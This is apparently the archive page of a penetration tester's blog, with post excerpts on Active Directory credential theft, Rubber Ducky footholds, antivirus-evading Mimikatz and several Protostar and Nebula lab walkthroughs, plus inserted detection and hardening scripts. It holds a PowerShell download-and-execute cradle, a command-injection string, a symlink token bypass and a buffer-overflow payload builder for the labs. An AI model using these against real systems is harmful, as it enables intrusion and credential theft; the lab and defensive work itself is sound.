Friday, January 11, 2019

DIY - Laying Hardwood Flooring

During the summer, I tasked myself with laying hardwood floors in our upstairs hallway and master bedroom. I've installed hardwood floors in the past, but I usually had help from my father-in-law. This time, I borrowed his tools and tackled the project myself. I did however have some help from my pregnant wife and mother-in-law (organized hardwood, vacuum, etc.) but all in all, I'd like to think that I successfully installed the flooring myself!

Master Bedroom complete

Thursday, January 10, 2019

SecKC Speaker Badge - Name Badge Hack

Over the past year, I have gained a fascination towards hardware hacking, soldering and building. For anyone that doesn't know, I am an active member of SecKC, the world's largest monthly information security meetup in Kansas City. Every month attendees get together in a relaxed environment and learn about security via networking and presentations. Recently, a SecKC participant started making Speaker badges. I was lucky enough to receive one during a Red vs Blue panel discussion back in 2018. With this speaker badge in hand and my eagerness to learn more about hardware hacking, I decided to put the pedal to the metal and make myself a custom name badge! Below are things I learned along the journey of creating this badge.




Thursday, November 29, 2018

Post Exploitation - Pulling NTDS and extracting with SecretsDump

To continue our example of targeting Active Directory, below is an example of how an attacker can pillage the NTDS file after obtaining a Domain Admin account that has access to a Domain Controller.

Tuesday, November 20, 2018

Gaining a foothold: The Rubber Ducky and PowerShell Empire

So, I recently acquired my first rubber ducky and I've been messing around with it quite a bit. I wanted to document the basic setup and provide some links for further reading.

All of my write-ups are conducted in a lab, but I try to emulate what can happen in real life. In our example below, I want to emulate a rubber ducky being plugged into a corporate managed windows device. This could have been done by either an attacker gaining physical access and plugging the rubber ducky in directly, or as done in past years, dropping them in parking lots and having employees pick them up and plugging them into their workstation. Either way, let's demonstrate what can happen.

We will be utilizing Kali as our payload generating machine and PowerShell Empire Server; and we will be attacking a Windows 7 host.

To start, we need to know which pieces of the Rubber Ducky do what. In its simplest form, we will be using three pieces: the micro SD card that carries our payload, the USB adapter that lets us write to that card, and the USB device (the Ducky itself) that delivers the payload when it is plugged in.

USB used to write payload


Friday, November 2, 2018

Post Exploitation - DCSync


Now that we have a Domain Admin account, another step that can be taken is to run "DCSync". DCSync abuses the Directory Replication Service protocol (MS-DRSR): the attacker's tool impersonates a Domain Controller and asks the targeted Domain Controller to replicate account data, password hashes included, exactly as a peer DC would. Any principal holding the replication extended rights on the domain object (by default the Administrators, Domain Admins and Enterprise Admins groups and the DC computer accounts themselves) can do this, so it lets an attacker pull credentials for every account in the domain, krbtgt included, and use them to maintain persistence.

As always, this is more of a step-by-step walkthrough on how the actions are performed. There are many other blogs that go into further detail on the attack and how to mitigate. I will not be doing that here.
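The post above deliberately leaves out the defensive side, so here is an added example of my own (not from the original post) of what detecting the technique looks like. A DCSync shows up as Security event 4662 on the Domain Controller with the replication extended-right GUIDs in the Properties field and a subject that is not a DC computer account. The script below parses a handful of constructed, flattened key=value event lines (not real Windows output), matches the GUIDs, and suppresses the DC-to-DC baseline. It assumes Directory Service Access auditing is on and the SACL on the domain object audits control access for Everyone; without that, 4662 never fires for replication.

```python
import re

# Extended-right GUIDs a DCSync needs; they come from the AD schema's controlAccessRight objects
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}")

# Constructed sample events, flattened to key=value (not the real Windows event layout):
# a DC replicating as usual, a user account replicating (DCSync), an unrelated 4662, a logon.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=CORP ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=CORP ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=CORP ObjectType=user "
    "Properties={0f0f0f0f-0f0f-0f0f-0f0f-0f0f0f0f0f0f} AccessMask=0x20",  # made-up, non-replication GUID
    "EventID=4624 SubjectUserName=jdoe SubjectDomainName=CORP LogonType=3",
]


def parse_event(line: str) -> dict:
    """Split a flattened event into fields and collect every GUID it mentions."""
    event = dict(FIELD_RE.findall(line))
    event["guids"] = {g.lower() for g in GUID_RE.findall(line)}
    return event


def detect_dcsync(lines, dc_accounts) -> list:
    """Flag 4662 events where a non-DC principal exercised a replication right."""
    dc_accounts = {name.upper() for name in dc_accounts}
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "4662":
            continue
        hits = event["guids"] & set(REPLICATION_RIGHTS)
        if not hits:
            continue
        subject = event.get("SubjectUserName", "")
        if subject.upper() in dc_accounts:
            continue  # DC-to-DC replication is the baseline, not an alert
        alerts.append({
            "subject": subject,
            "domain": event.get("SubjectDomainName"),
            "object": event.get("ObjectType"),
            "rights": sorted(REPLICATION_RIGHTS[g] for g in hits),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(alert)
```

The allow-list of DC accounts is the tuning knob: legitimate non-DC replicators such as an Azure AD Connect service account will show up here too and need to be added deliberately, not silently ignored.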



To continue about our example, we will assume the following:

Gaining a foothold: Using Responder and NTLM Relay attack

A previous post showed how to capture NTLMv2 hashes and crack them. But what if the passwords don't crack? Is there any way to use the captured authentication without knowing the password? Lucky for us, there is. The captured Net-NTLMv2 challenge/response can't be "passed" the way an NT hash can, but it can be relayed to another host that accepts NTLM authentication and does not enforce signing. A great post written by byt3bl33d3r back in 2017 covers exactly what I'm about to briefly show; I suggest you check out his post for more information.

Like most of my posts, I only scratch the surface and emulate a real attack. I don't go in depth since there are tons of other write-ups out there that do. Instead, I make more of a step-by-step illustration of how the attack was conducted.



To get started, it is important to know the difference between some of the technology:

Friday, October 26, 2018

Post Exploitation - Kerberoasting

Below is a real world use case of kerberoasting. This is not intended to be a guide on kerberoasting, there are way better guides out there and explanations on how it all works. Rather, this is more of a step by step walk-through of using kerberoasting to escalate privileges from a regular domain user to a higher privileged user.


Thursday, May 17, 2018

Gaining a foothold: Using Responder to capture NTLMv2 Hashes and cracking with John the Ripper

Recently, I finally got my new home lab set up and I figured it was time to start documenting some tools that are used quite often within penetration testing.

Today I am going to demonstrate how to run Responder in its most basic form, capture an NTLMv2 hash and crack it with John the Ripper. Note that what Responder captures is a Net-NTLMv2 challenge/response, not the user's NT hash: it can be cracked offline, but it cannot be passed. This will not be an exhaustive list of everything Responder can do (there are many blog posts out there that cover that); I will just be demonstrating how this can be done at its simplest. It is up to you to decide how far you want to go with this information.


Wednesday, May 2, 2018

Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

About

The other day I was part of an engagement that required post exploitation of a target system (administrative access had already been obtained) to steal credentials. There are many posts online that cover this and I will reference them as we go. This is just a supplement to everything else out there.

Mimikatz is a tool that collects credentials, including cleartext passwords, LM and NT hashes, Kerberos tickets and a number of other items. This post leverages Mimikatz, but instead of downloading the binary to the target's disk and risking that AntiVirus or other host-based controls trip and stop us, we will download the PowerShell script straight into memory and run it without it ever touching disk.

Additionally, there are a few obfuscation techniques that can be applied with simple Linux fu to generate a "custom" version of Mimikatz that helps it slip past signature-based AV. Lastly, there is another technique to obfuscate the PowerShell command itself that downloads and invokes the script.
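Since the in-memory download-and-invoke is the part a blue team gets to see (PowerShell script block and command-line logging), here is an added example of my own, not from the original post, of the matching detection. It assumes the cheap obfuscations a defender runs into most: -EncodedCommand (base64 of UTF-16LE), backticks inside identifiers, and 'Down'+'load' string splitting; it undoes those, then requires both a download primitive and an execution primitive before calling something a cradle. The sample command lines are constructed, and 10.0.0.5 is an assumed lab host.

```python
import base64
import re

DOWNLOAD_PRIMITIVES = (r"downloadstring", r"downloadfile", r"net\.webclient",
                       r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod")
EXEC_PRIMITIVES = (r"invoke-expression", r"\biex\b", r"\.invoke\(")
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def normalize(cmd: str) -> str:
    """Undo the cheap tricks before matching: -EncodedCommand (base64 of UTF-16LE),
    backtick escapes inside identifiers, 'Down'+'load' string splitting, and case."""
    m = ENCODED_RE.search(cmd)
    if m:
        try:
            cmd += " " + base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass  # not really an encoded command; keep matching on the raw text
    cmd = cmd.replace("`", "")
    cmd = re.sub(r"['\"]\s*\+\s*['\"]", "", cmd)  # 'Down'+'loadString' -> 'DownloadString'
    return cmd.lower()


def cradle_hits(cmd: str):
    """Return the download primitives and execution primitives found after normalisation."""
    norm = normalize(cmd)
    downloads = [p for p in DOWNLOAD_PRIMITIVES if re.search(p, norm)]
    execs = [p for p in EXEC_PRIMITIVES if re.search(p, norm)]
    return downloads, execs


def is_download_cradle(cmd: str) -> bool:
    """A cradle needs both halves: fetch something remote AND hand it to an evaluator."""
    downloads, execs = cradle_hits(cmd)
    return bool(downloads) and bool(execs)


# Constructed samples; 10.0.0.5 is an assumed lab address, im.ps1 an assumed script name
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/im.ps1')"
SAMPLES = {
    "plain": 'powershell -nop -w hidden -c "' + INNER + '"',
    "backticks_concat": "powershell -c \"I`EX (New-Object Net.Web`Client)."
                        "('Down'+'loadString')('http://10.0.0.5/im.ps1')\"",
    "encoded": "powershell -nop -enc " + base64.b64encode(INNER.encode("utf-16le")).decode(),
    "benign": 'powershell -c "Get-Process | Sort-Object CPU -Descending"',
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print("%-16s cradle=%s hits=%s" % (name, is_download_cradle(cmd), cradle_hits(cmd)))
```

This catches the obfuscation the post hints at only as far as the normaliser goes; an attacker who builds the method name with [char] arithmetic or -join walks past it, which is why script block logging (event 4104, which records the de-obfuscated script as it runs) is the better source than the raw command line.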


Tuesday, April 24, 2018

Privilege Escalation through CyberArk Viewfinity

A while ago I encountered a bug within Viewfinity 5.5 (5.5.10.95). Viewfinity is a product owned by CyberArk that provides Endpoint Privilege Management; it bolsters administrators' ability to control user privileges on corporate desktops. Below is a use case in which I was able to elevate privileges from a normal user to Admin through this product.

Step 1: Verify you are a low-privilege user by running the command "net session". Net session displays information about all sessions on the local computer, and a user without Administrator privileges gets "Access is denied".


Thursday, October 5, 2017

RickdiculouslyEasy: 1 - Walkthrough

It has been a long time since I've last posted anything off of Vulnhub. To be honest, I just haven't had much time to dive into any of these VMs. However, g0tmi1k released a ton of new VMs so I wanted to check them out. One of which was RickdiculouslyEasy: 1, made by Luke.

This VM is based off the tv show Rick and Morty. I, myself, am a fan of this show so I had to check it out. It turned out to be quite easy but I still had fun solving it. Below is my walkthrough on capturing all of the flags. 


Friday, June 30, 2017

Elevate from Admin to NT Authority\SYSTEM


The other day I gained Administrative access to a windows machine. While I was enumerating around, I had the urge to escalate to the most powerful account on a Windows local instance: NT Authority\SYSTEM.

I realized there weren't a lot of posts online about it. I figured I'd give the steps I did in order to accomplish this task.



Wednesday, May 3, 2017

64Base - Walkthrough




It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!



Monday, April 10, 2017

Protostar - stack4

This is my fifth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


About

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.
This level is at /opt/protostar/bin/stack4
Hints
  • A variety of introductory papers into buffer overflows may help.
  • gdb lets you do “run < input”
  • EIP is not directly after the end of buffer, compiler padding can also increase the size.

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}


Nebula - level08

This is my ninth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

World readable files strike again. Check what that user was up to, and use it to log into the flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Source code

There is no source code available for this level


Thursday, March 9, 2017

Protostar - stack3

This is my fourth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints
  • both gdb and objdump are your friends in determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}


Tuesday, March 7, 2017

Nebula - level07

This is my eighth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

Source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));
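The bug in the level's Perl is that the Host parameter is interpolated straight into a backticked shell command, so any shell metacharacter in it runs as flag07. As an added example of my own (not part of the level or the original post), here is the same pattern in Python next to a hardened version: the vulnerable string build for comparison, then an allow-list (an IP literal or an RFC 1123 host name) and an argv-style subprocess call with no shell at all. The injection string below is constructed, and the network call is only in the helper at the end.

```python
import ipaddress
import re
import subprocess

# RFC 1123 host name: dot-separated labels of letters/digits/hyphens, no leading or trailing hyphen
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(host: str) -> str:
    """The Perl pattern above, one-to-one: the parameter is interpolated into a shell command line."""
    return "ping -c 3 %s 2>&1" % host


def is_valid_host(host: str) -> bool:
    """Allow-list: an IPv4/IPv6 literal or an RFC 1123 host name, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def safe_ping_argv(host: str) -> list:
    """Build argv for subprocess without a shell; metacharacters in `host` stay inside one argument,
    and a leading '-' (an option-injection attempt) never passes the allow-list."""
    if not is_valid_host(host):
        raise ValueError("invalid host: %r" % host)
    return ["ping", "-c", "3", host]


def ping(host: str) -> str:
    """Run the hardened version (needs a network, so the checks only exercise the argv builder)."""
    proc = subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=15)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    payload = "127.0.0.1; cat /home/flag07/token"  # constructed injection attempt against Host=
    print("vulnerable:", vulnerable_command(payload))
    print("hardened  :", safe_ping_argv("127.0.0.1"))
    try:
        safe_ping_argv(payload)
    except ValueError as exc:
        print("rejected  :", exc)
```

Quoting the value (shlex.quote) would also stop this particular injection, but it still hands the string to a shell; validating against what a host name can look like and dropping the shell entirely removes the whole class of bug rather than one instance of it.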

Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* errx(); not in the level's original listing, added so it compiles cleanly */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);   /* unbounded copy from the environment: the intended overflow */

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}
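The stack4, stack3 and stack2 levels above are all the same mechanic: fill the 64-byte buffer, then land a 4-byte little-endian value exactly where the target lives (the saved EIP, the fp function pointer, or the modified variable). As an added example of my own, not from the original posts, here is a small payload builder that covers all three, plus the two pieces the stack4 hints point at: a cyclic pattern to find the real offset (the one "compiler padding" moves) from the value gdb shows in EIP, and a check for bytes the input path would swallow (gets() stops at 0x0a, strcpy()/getenv at 0x00). The address of win() is read from objdump -d as the hint says; the script takes it on the command line rather than hard-coding a value.

```python
import string
import struct
import sys

BAD_BYTES = {"gets": {0x0A}, "strcpy": {0x00}}  # what each input sink truncates on


def cyclic(length: int) -> bytes:
    """'Aa0Aa1...' pattern (the Metasploit pattern_create scheme): every 4-byte window is unique
    across the full 20280-byte sequence, so the word that lands in EIP identifies its offset."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def cyclic_find(eip_value: int) -> int:
    """Offset of the 32-bit value gdb showed in EIP (or in fp for stack3) after a cyclic crash."""
    return cyclic(20280).find(struct.pack("<I", eip_value))


def build_payload(offset: int, target: int, filler: bytes = b"A") -> bytes:
    """`offset` bytes of filler followed by the little-endian 32-bit value that overwrites
    the saved EIP (stack4), the fp function pointer (stack3) or `modified` (stack2)."""
    return filler * offset + struct.pack("<I", target)


def bad_bytes(payload: bytes, sink: str) -> set:
    """Bytes the given sink would stop at before the whole payload is copied."""
    return {b for b in payload if b in BAD_BYTES[sink]}


if __name__ == "__main__":
    # usage: python3 payload.py OFFSET 0xADDRESS [gets|strcpy] | /opt/protostar/bin/stack4
    # OFFSET comes from cyclic_find(); 0xADDRESS is win()'s address from objdump -d
    offset, target = int(sys.argv[1]), int(sys.argv[2], 16)
    sink = sys.argv[3] if len(sys.argv) > 3 else "gets"
    payload = build_payload(offset, target)
    if bad_bytes(payload, sink):
        sys.exit("payload contains bytes that %s will not deliver: %r" % (sink, bad_bytes(payload, sink)))
    sys.stdout.buffer.write(payload + b"\n")
```

For stack2 the target value 0x0d0a0d0a packs to the bytes 0a 0d 0a 0d, which is fine in an environment variable but would be cut short by gets(); that is exactly the kind of thing the bad_bytes check is there to flag before you spend an hour wondering why the overwrite "doesn't work".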

Saturday, March 4, 2017

Nebula - level06

This is my seventh post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level


Nebula - level05

This is my sixth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level


Wednesday, March 1, 2017

Protostar - stack1

This is my second post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.


Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>      /* err(); not in the level's original listing, added so it compiles cleanly */

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  /* the only guard: a substring test on the literal argument, not on what it resolves to */
  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

Reading the code above: the program takes one argument, the path of a file to read. If that argument contains the substring "token" anywhere, it refuses and exits. Otherwise it opens the file, reads up to 1024 bytes (the read is bounded by sizeof(buf), so there is no overflow to chase here) and writes them to stdout. The important detail is that the check is a plain strstr() on the string we pass in, not on the file that path actually resolves to.

So the only thing standing between us and the token is the name filter; the binary itself, as we'll see, runs with flag04's privileges and can read the file just fine.

With our information in hand, we SSH into the host:

level04@nebula:/home/flag04$ ls -lah
total 13K
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ 

Per usual, we see the flag04 binary has the SUID bit set, is owned by flag04, and is executable by the level04 group (us). The token file itself is readable only by flag04.

We run the file to get a feel with what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around, it becomes clear that the filter only looks at the literal argument string. So we create a symbolic link whose name does not contain "token" (and which we own, since it lives in /tmp) pointing at /home/flag04/token, and hand the link's path to the program. The filter passes, open() follows the link, and because the binary runs as flag04 it can read the real file.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We created a symbolic link at /tmp/level04 pointing to /home/flag04/token and verified it with ls -lah. The link belongs to level04, which doesn't matter; what matters is that the path we will pass to the program does not contain "token".

We then test our theory and execute:


level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.
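The fix for this class of bug is to apply the policy to what the path resolves to, not to the string the caller typed. As an added example of my own (not part of the level or this walkthrough), the script below rebuilds the level in a temporary directory with constructed files, runs the naive substring check next to a hardened check that resolves symlinks and ".." first and also refuses anything outside the owner's home, and returns both verdicts for the direct path, the symlink trick, and a traversal attempt.

```python
import os
import tempfile

FORBIDDEN = "token"


def naive_filter_allows(arg: str) -> bool:
    """What flag04 does: strstr(argv[1], "token") on the literal argument string."""
    return FORBIDDEN not in arg


def hardened_allows(arg: str, home: str) -> bool:
    """Resolve symlinks and '..' first, then apply the policy to the real target and
    additionally refuse anything that resolves outside `home`."""
    real = os.path.realpath(arg)
    home_real = os.path.realpath(home)
    inside = os.path.commonpath([real, home_real]) == home_real
    return inside and FORBIDDEN not in os.path.basename(real)


def demo() -> dict:
    """Rebuild the level in a temp dir (constructed files, not the Nebula VM) and compare the checks."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "flag04")
        os.mkdir(home)
        token = os.path.join(home, "token")
        with open(token, "w") as fh:
            fh.write("constructed-token-value\n")
        link = os.path.join(root, "level04")  # same trick as ln -s /home/flag04/token /tmp/level04
        os.symlink(token, link)
        traversal = os.path.join(home, "..", "flag04", "token")
        return {
            "naive_direct": naive_filter_allows(token),
            "naive_via_link": naive_filter_allows(link),
            "hardened_via_link": hardened_allows(link, home),
            "hardened_traversal": hardened_allows(traversal, home),
            "hardened_bashrc": hardened_allows(os.path.join(home, ".bashrc"), home),
            "hardened_outside": hardened_allows("/etc/passwd", home),
        }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-20s %s" % (name, verdict))
```

Even the hardened check is a check-then-open and can be raced by swapping the link between the two calls; in a real SUID program you would open with O_NOFOLLOW, or open first and apply the policy to the descriptor via fstat(), rather than trusting any path string twice.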

Thanks for reading!

-geoda





Monday, February 27, 2017

Protostar - stack0

This is my first post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


To begin, I run the program to see what's going on:

$ ./stack0

Try again?
$ ./stack0
HI
Try again?
$ 

Okay. Looks like that wasn't what we wanted.

Based off the code, we want the program to print "you have changed the 'modified' variable". We don't need to crash the program to do that; we just need to write past the end of the buffer into the 'modified' variable that sits right after it on the stack.

We have 64 bytes of buffer allocated. If we send more than 64 bytes, the 65th byte lands in 'modified' and changes it from 0 to something non-zero.

Let's give this a whirl:


$ python -c 'print "A" * 64' | ./stack0
Try again?
$ python -c 'print "A" * 65' | ./stack0
you have changed the 'modified' variable
$ 

Excellent!

Our next attempt will be on stack1.

Thanks for reading!

-geoda





Sunday, February 26, 2017

Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Saturday, February 25, 2017

Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level01

This is the second post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level00

This is my first post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Lord of the Root: Walkthrough

Below is my walkthrough for a VM posted on Vulnhub by KookSec called Lord Of The Root back in 2015.



Sunday, February 12, 2017

Pegasus: 1 - Walkthrough


This vulnhub image is called "Pegasus: 1" and it was created by Knapsy.



I found this VM had the perfect balance of remote and local exploitation. There were definitely times during this where I was slamming my head on the desk confused at what I was doing wrong. Other times, I knew exactly what I needed to do, I just didn't know how to actually accomplish the task. This really brought me back to my OSCP days and the infamous "Try Harder". Like anything, if you don't know how to achieve something, spend time researching and learning; it will eventually pay off!

Thursday, October 13, 2016

DerbyCon 6.0 - Recharge: My First Security Conference


It's been a while since I've posted anything. I'm actually getting married in a few short weeks and found that my life has been pretty hectic lately. But I knew before I went on my honeymoon, that I needed to find some time to briefly write about the BEST (and my first ;]) security conference: DerbyCon!

Tuesday, August 30, 2016

Breach: 2.1 Walkthrough


The past few weeks I've been working off and on with Breach 2.0/2.1 created by mrb3n.

This VM was a ton of fun. I've always enjoyed the movie Office Space and anytime there's a theme that interests me, it makes it even more fun to compromise!

Without further ado, here's my walkthrough of the latest VM on VulnHub... Breach 2.0:


Saturday, August 13, 2016

Tommy Boy: 1 Walkthrough

Today I finally completed the Tommy Boy: 1 VM created by Brian Johnson that was on VulnHub. 

This was one of my favorite VM's seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.

The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."

Sounds simple enough, let's see what it had to take to pwn this box!


Friday, August 12, 2016

TopHatSec: Freshly Walkthrough

Another VM that I found on VulnHub is TopHatSec: Freshly that is created by TopHatSec.

I had this VM in my KeepNote for a while now, but never thought to throw it up online until recently. Here's my reenactment for rooting this box several months ago:

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24:

Thursday, August 11, 2016

BNE0x03 - Simple Walkthrough

This is my first VulnHub write-up. I've accrued many folders in my KeepNote and decided it was time to post them in a centralized location to help myself become better at documenting my findings. More than likely the first few posts will be very simple and will not have much narrative. As I become more comfortable, I will start to add my own spin on things. Let's do this.

This VM is called SecTalks: BNE0x03 - Simple and it was created by Robert Winkel

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24: